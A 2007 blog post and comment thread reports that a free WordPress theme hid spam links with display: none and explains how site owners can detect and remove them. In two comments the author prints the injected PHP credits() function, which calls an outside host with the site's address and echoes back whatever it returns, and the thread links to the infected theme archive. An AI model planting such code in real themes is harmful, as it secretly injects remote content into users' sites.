Lately I’ve been making a tonne of adjustments to my site and tweaking it to perform as best as it can in search engines. In the process however, I discovered a nasty tick that I’d been harbouring for a while.
I’m using a free WordPress Theme design called “I feel dirty” by some Spanish design firm. Whilst I was tearing the site apart and analysing the code I found that this company had been hiding links in my own blog with style="display: none;". Now, these weren’t just links crediting the theme author, they were hidden links promoting gambling, porn and other unsightly websites for the SEO-minded. Just take a look at this screen shot I took of the site without CSS styles to hide them:
Here is another screenshot showing the code and the address of the incriminating website:
Now, when you have those links in your website, they serve to impact your search engine rankings on two fronts.
- It associates you with a bad site.
- They use sketchy techniques to hide links against Google’s Webmaster Guidelines.
For instance, notice how you cannot see any links down the bottom of my page in this picture? 
There is a special CSS attribute that blackhat SEO “gurus” use to hide links from users. When you type style="display: none;" into your link code, they are hidden from users browsing your site, but not from search engines. Google is against it’s unethical use and I’m guessing other engines are too. While they do allow the technique to be used in some circumstances, I believe they might discount the content surrounded by that attribute.
You may call me a little hypocritical, but I use this attribute on my site to hide text as well, however I do it in a way that is useful to my users. In fact, I use it in the box below this post for the related content and post information. It’s just a more aesthetic way for me to provide my users with relevant information in a proper GUI. Google might count that content and they might not, but as long as I’m providing unique and relevant content to my users, naturally, I doubt they care.
So, next time you’re downloading a free theme, why don’t you take a look behind the scenes and scout out those style="display: none;" links!
For software which can disable CSS for you to find those links on your blog, go and grab the Firefox Web developer plugin!
UPDATE:
After some cyber sleuthing, Zen Zoomie has deduced that any theme downloaded from http://www.templatesbrowser.com/wordpress-themes/ are infected with spammy links. Checkout his first post about Infected Free Wordpress Themes and his summation of what we learned.
Related Posts
- Create an Effective Internal Linking Structure in WordPress Pt. 2: NoFollow and Navigation
- Develop Consistent Content On Your Site With a Mindmap
- Create an Effective Internal Linking Structure in WordPress Pt. 1: Plugins
- A Website Built And Published In Just 5 Minutes: Google Pages
- Create an Effective Internal Linking Structure in WordPress Pt. 3: Duplicate Content
Posted by Robert Kingston on Friday, July 6th, 2007 at 6:43 am. Category: Marketing, My Projects. Comment Feed: RSS 2.0. Leave a Comment below, or a trackback from your site.
That sucks dude! You can trust anyone. I don’t use Wordpress and all my templates are self made. However, I’ve downloaded php programs to add to my site only to discover the author is really creating linkbacks to his site! Want to get a ton of linkback. Write a program or in your case a template and distribute it. Of course hide the link.
Patrick
July 6th, 2007
Tell me about it Pat…
I thought it was credit enough to build backlinks through a link at the bottom of in footers but no. They had to monetise it with dodgy links.
I wish I could make Wordpress Templates. I’ve been tweaking them and playing with the code for about 8 months or so now. And from what I’ve learned about optimising sites for search engines, I think it’d be well worth learning so I could make a site that fits my ideas about pushing page rank, creating relevant content and all that.
Looks like you’re on the money with your site though. I’ve personally watched our forums dominate SERPs. Have you considered throwing up some more content in there or hiring people to chat in your forums temporarily?
Robert Kingston
July 6th, 2007
Wow that is … just wow. I had no idea people were doing that.
kevin
July 7th, 2007
I have to say that this is a great notice that you picked up. It is scary what can be on your theme. Courtney Tuttle helped me revise mine to make it more SEO friendly. Have you seen any improvements SEO wise since this awareness?
Mark@CreditCards
July 7th, 2007
I’m not so sure to be honest. Search traffic is up slightly, as far as I can tell through Analytics. I think the real tell will be when the next PR update comes along, though.
Robert Kingston
July 7th, 2007
Wow, that is something that every blogger should check. I had no idea that people were doing that kind of stuff. I am going to check my blog right now! Thanks so muc for the info!
emily
July 8th, 2007
There’s another simple way to check for hidden links for those who don’t want to install the Firefox Web developer plugin. Just right-click on the page in Firefox and select “View Page Info”. The “Links” tab will show you every link on the page, hidden or not.
Kevin Henney
July 11th, 2007
Hey Kev,
I’ve never noticed that one. Thanks for the heads up…
Robert Kingston
July 11th, 2007
Wow, this is really great information! Thanks for noticing and bringing it to our attention. I don’t use WordPress, but I have a friend who does. So I’m going to pass this info along. Thanks again!!!
Beccagirl
July 12th, 2007
This is a shame, because it only hurts the honest wordpress theme designer, making them all look bad. Thank you for pointing this out though.
Wii Fit
July 14th, 2007
Wow…who woulda thought? Are there any WordPress plugins or tools that can check your site for these hidden links?
Zen Zoomie
July 14th, 2007
Wow, is this CSI:Australia? Why is it you just can’t do business, you must set aside part of your mind to be vigilant. Even locally, we had a situation where a competing design firm took all of their competition’s keywords and put them onto their site. The local design community thought this very unethical. They relented and removed them. I’m sure they were astonished that someone would ever know. But it was the inner geek in one of us who happened to trip over this - what a shame they felt the compulsion for the dark side.
P.S. I like these changes Robert.
Ed Roach
July 15th, 2007
Everyone will be scrambling over to their blogs and checking the code now, i know i will. I guess nothing in life is ever truly FREE! sally
Sally Neill
July 18th, 2007
Hey Zen,
I’ve never heard of any wordpress plugin which could check links inside you blog for those kind of spammy links, all I know that you can do to find out is by right clicking on your page in Firefox and selecting “View Page Info”, then you can visit a tab called “Links” where you’ll be able to work out which links are yours or not.
The way I prefer to do it is by downloading a plugin for Firefox called the Firefox Web Developer toolbar and disabling CSS when you visit your website’s page. You can grab a copy of the web developer plugin here:
https://addons.mozilla.org/en-US/firefox/addon/60
Robert Kingston
July 18th, 2007
Hey Ed,
Hahaha, yeah. I’ve picked this website apart so much I know it better than the back of my hand…
I doubt these unethical practices will disappear anytime soon. Things are becoming way too complex these days to even notice the small things like hidden links and stolen keywords. Yaro and I run forums which people continually steal content from and its just way too hard to find until the last moment.
I think the keywords aren’t too much of a problemthough. If anything the firm copying the keywords off their competitor’s website would probably get a nasty shock. I’m guessing the firm who owned the keywords originally had a professional SEO guru tend to their site. The person copying the keywords would probably have a harder time competing to rank for those same keywords.
I guess at the end of the day, all that matters is whether or not you can fix it - if so, good news. If not, then we’ll have to deal with it and move on. Good to know that it got sorted out, I hate it when people do that…
Also re: the changes I’ve made to my design - Thanks. I like it too. I guess you were always right about needing to have a white background with Dark text - hence the changes you made to your blog so long ago! Speaking of which, I can’t see any hidden links on yours at all…
Robert Kingston
July 18th, 2007
Robert,
Have you contacted the authors of the I Feel Dirty theme to ask them about this? I downloaded it today to do some investigative reporting of my own, and the hidden links you had on your site are no where to be found in the version I downloaded…
Zen Zoomie
July 18th, 2007
Hey Zen,
You’re dead right… It looks as if the original theme from Studio ST doesn’t contain the links at all. It must have been placed in there by a third party.
When I downloaded myself, inside the functions.php file I found the following code:
< ?php
function credits()
{
$url = "http://get.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
?>
When that function was called in the footer it placed random spam links inside my site.
That’s nasty stuff… Thanks for the news!
Robert Kingston
July 19th, 2007
The version I have had a comment in the footer.php that I found interesting:
But no functions.php file or sign of the above code in sight. Just curious–where did you download it from?
Zen Zoomie
July 19th, 2007
Hmm…looks like the code got stripped because it looked like PHP code.
The comment inside it was this:
/* “Just what do you think you’re doing Dave?” */
Zen Zoomie
July 19th, 2007
I wish I could remember but I have no idea anymore. It definitely wasn’t from Studio ST’s website. It must have been the Wordpress theme Database.
As for the comment, I don’t really know what they mean by that either. It’s just a comment so I don’t think it’s going to have an impact on things too much. Just count yourself lucky you didn’t find that functions.php!
Robert Kingston
July 19th, 2007
For anyone interested to see what this code looks like, I’ve uploaded the untouched backup of the theme, which I keep on my computer.
Take a look here:
http://www.bracingyourbrand.com/byb/i-feel-dirty.rar (Right-click, ‘Save As’)
Pay particular attention to ‘footer.php’ and how it calls the function responsible (
< ?php credits(); wp_footer(); ?>) for the unsavoury links from ‘functions.php’.Robert Kingston
July 20th, 2007
[...] just ran across a scary post at http://www.bracingyourbrand.com that took me back a couple of steps. Robert Kingston, the author of that site, had recently started [...]
Beware the Free WordPress Theme
July 20th, 2007
[...] just ran across a scary post at http://www.bracingyourbrand.com that took me back a couple of steps. Robert Kingston, the author of that site, had recently started [...]
Beware the Free WordPress Theme
July 20th, 2007
Thanks Robert. So I guess the most likely villain here is whoever owns the domain templatesbrowser.com that’s serving up the hidden ads.?
P.S. Fixed the link to your article from my site…
ZZ
Zen Zoomie
July 20th, 2007
[...] a call to credits. Or as a third option, try using the free FireFox developer’s add-on that Robert suggested. The above steps will only catch templatesbrowser.com modified themes. Robert’s technique [...]
Beware the Free WordPress Theme - Revisited
July 20th, 2007
My experience
http://varunkrish.com/beware-templatesbrowsercom-are-fing-spammers.html
varun
July 30th, 2007
thanks for the heads up - i’ll check into these more often.
I had bought some website translation software that did this - and it ranked number 1 in google… lol… but i disabled it and put in a visible link to the affiliate program instead.
Matt Ellsworth
August 1st, 2007
Had a client whose site was hacked. The hacker put in some links to porn sites, and CSS’ed them to invisibility. It seems Google discovered these links and penalized the page (which was when we noticed). While this case had nothing to do with WordPress, per se, please be aware that these sort of invisible links can absolutely hurt you in the search engines.
Brian Combs
August 3rd, 2007
Wow…I think I’m going to cruise through all my templates and double check that I don’t have any of that nonsense going on.
Irvine Mortgage
August 12th, 2007
Great post, this and wordpress upgrades is what people should pay most attention to. XSS vulnerabilities from wordpress bugs are even worse than this.
Palm Coast
August 14th, 2007
Hmmm… I’m not too sure how XSS vulnerabilities work but It’s understandable that some people could do some serious damage by infecting free themes with malicious script, not so different than what we’ve seen above.
Robert Kingston
August 14th, 2007
I had no idea this kind of thing was going on. Just goes to show that even if it’s unethical and we should not be using it ourselves it definitely is in every webmaster and bloggers best interests to at least learn about blackhat techniques. After hearing about this I just feel completely used.
Survey Spot
August 17th, 2007
Hello Mr. Robert,
I know it’s a bit late ( date wise ) but I just came acroos your blog and was wondering where does one go ( inside the theme files ) to delete these links?
I’m new to editing blog themes but can move around a little in the theme folder.
However, I’m having trouble finding a footer link that came with a free blog theme anywhere in the files?
Help Me If Possible,
Bernard
Bernard
February 10th, 2008
Hi Bernard, No worries. What you will need to do, is goto your blog’s frontpage and view the source code of the page. (Right Click in Firefox, View | Source Code in Internet Explorer I think). Once you’ve done that, scroll to the bottom of the document and you may find a suspicious bit of code down the bottom. For me, it was in another language and the URL it had was pointing to a Casino.
Once you’ve found that, you need to go into your WordPress Dashboard, open up the tab called “Presentation” and select the “Theme Editor” tab.
In here you will need to select “footer”, on the right hand side. When this has loaded, scroll through and check the code for any suspicious links.
Personally, I had to remove this code:
< ?php
function credits()
{
$url = "http://get.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
?>
Yours may be different. I don’t recommend changing your theme’s source code unless you know what you’re doing though. If you delete the wrong code you could ruin your theme. Before trying to remove any nasty links, you might like to make a backup of your theme files.
Hope that helps, Bernard.
Robert Kingston
February 10th, 2008
Thank you so much!
Getting good honest and timely responses like yours is rare these days.
You really spared me from some growing panic.
While I was waiting for your response I started reading all kinds of Blogs on this subject and they all paint a pretty dark picture of this as a big problem.
Furthermore, none of the ones I found gave any elementary tips on removing these.
Not sure how RSS works but if it is a bookmark or email notify option I’m trying your blog with it.
Will be visiting your site often and thanks again.
—Bernard
Bernard
February 10th, 2008
Robert,
While your directions were very easy to follow and lead me right to the spot…WP’s theme editor would not allow me to edit it?
Or, should I say there is no “save” or “update” buttons there.
I deleted a block of code and when I went away and came back it was back in it’s original form.
I hope I’m not being a pest here but you are the only source for getting to the bottom of this I have right now and any further help is greatly appreciated.
I’ve checked all the php pages in the theme folder but cannot find the three links that appear in the footer?
Appreciate the Help,
Bernard
Bernard
February 10th, 2008
Hi Bernard, you’re welcome.
Are you sure you found the right piece of code which has the spam link in it?
If you like, you can post your URL here and I can take a look for you, to point you in the right direction.
I suspect that your theme cannot be changed from within WordPress. You may need to download your theme from your server using an FTP program, making the necessary edits and uploading the changed files back, onto your server.
Robert Kingston
February 10th, 2008
Oh my! I’m not too bright! I hope you read this response before answering with any great effort the previous one…because I found it!
I could have sworn that I opened the footer.php file in my text editor numerous times but I guess I either didn’t or I did not have the courage to delete the weird code found in there.
I would have pasted it in here for you to see but I’m afraid to because it was soley responsible for the entire three links that appeared at the bottom of the theme!
I don’t feel guilty because they really didn’t go to or help you find anything on the theme I’m using so maybe they are outdated or maybe they are just traffic builders?
Robert, is there any way I can let you see this nasty, garbled paragraph of text without it activating the same set of links to the authors/designers that put it there?
You would not believe your eyes…I have been reading and hand typing basic html code ( and avoiding hard code ) for years now ( just not php or blogs ) and I’m telling you it must be magic how this gobblety-gook could ever produce an action to cause links to appear anywhere, let alone remotley.
Sorry, for ranting on and on like this but maybe your subscribers should know how far out some of this stuff is and looks?
Please delete any of my posts that are redundant or confusing to your readers.
Sincerely,
Bernard
Bernard
February 10th, 2008
Like I said Bernard - no problem, just a lazy Sunday afternoon here…
You can paste the code up here if you like, I can delete it if it does anything. Also Google won’t be crawling this page for another few days, so even if it does, it won’t hurt anyone.
By the way, the discussion is always good. If others have the same problem they can find the solution in the comments here.
Robert Kingston
February 10th, 2008
Whoa, did you say lazy Sunday afternoon!
It’s 12:40 a.m. Sunday here…you must be in Australia?
Okay here goes: —-{ }—-
Now I added the —-{ & }—- at the beginning and end just because I wanted to block anything weird from happening. That’s funny because I have no idea if that would work or not.
Anyway, maybe what you and your readers see here is not so shocking but I removed it and left nothing ( completely blank ) in the footer.php and it removed the three links in the theme entirely. seemingly ( so far ) without any drawback or broken pages to the theme.
Now, I’m gonna go back and re-read this thread and make sure I check all the other potential spots you and others here warned of for the theme I’m using just to be safe.
Robert, you think there is anyway whomever wrote this code can tell it’s been removed?
If you say yes to the above I think I’ll just give up and go buy a spammy free template and be done with it.
Kinda frustrating to keep up with all the spammy stuff sometimes.
Peace,
Bernard
Bernard
February 10th, 2008
Robert,
Just took a look at the post after submitting it and the paste is missing?
This is creeping me out pretty bad!
How do I send you a jpg of it because obviously it will not post?
Bernard
February 10th, 2008
I just shot you an email, Bernard.
Robert Kingston
February 10th, 2008
[...] http://www.bracingyourbrand.com/37/…-black-hat.html http://forum.joomla.org/index.php/topic,185573.0.html [...]
Template per Worpress e CMS Joomla con codice pericoloso | Posizionamento nei motori di ricerca - Posizionamento siti web - Indicizzazione siti web - Tecniche SEO
February 18th, 2008
[...] http://www.bracingyourbrand.com/37/…-black-hat.html http://forum.joomla.org/index.php/topic,185573.0.html [...]
Template per WordPress e Joomla con codice pericoloso | Realizzazione siti web - Creazione Siti web - Progettazione siti web | WebBIZ
February 26th, 2008